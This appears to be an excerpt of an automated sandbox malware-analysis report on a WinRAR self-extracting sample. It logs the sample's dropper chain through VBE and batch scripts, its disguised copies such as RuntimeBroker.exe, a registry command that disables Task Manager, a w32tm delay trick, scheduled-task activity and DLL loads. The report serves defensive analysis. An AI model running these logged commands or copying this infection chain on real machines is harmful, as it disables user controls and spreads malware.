Source: C:\savesbrokerCrt\driverDhcp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9hYFnRH7ET.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe "C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe "C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Default\Pictures\RuntimeBroker.exe "C:\Users\Default\Pictures\RuntimeBroker.exe"
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\savesbrokerCrt\bcvGZWoxOhP8n94Lb3YDqsN.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\savesbrokerCrt\V4ZyqY05RylvaMusXQjEq4yt.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\savesbrokerCrt\driverDhcp.exe "C:\savesbrokerCrt\driverDhcp.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9hYFnRH7ET.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Default\Pictures\RuntimeBroker.exe "C:\Users\Default\Pictures\RuntimeBroker.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: mscoree.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: version.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: wldp.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: profapi.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Section loaded: sspicli.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Mj6WEKda85.exe

Static file information: File size 1244405 > 1048576

Source: Mj6WEKda85.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Mj6WEKda85.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Mj6WEKda85.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Mj6WEKda85.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Mj6WEKda85.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Mj6WEKda85.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Mj6WEKda85.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: Mj6WEKda85.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Mj6WEKda85.exe

Source: Mj6WEKda85.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Mj6WEKda85.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Mj6WEKda85.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Mj6WEKda85.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Mj6WEKda85.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

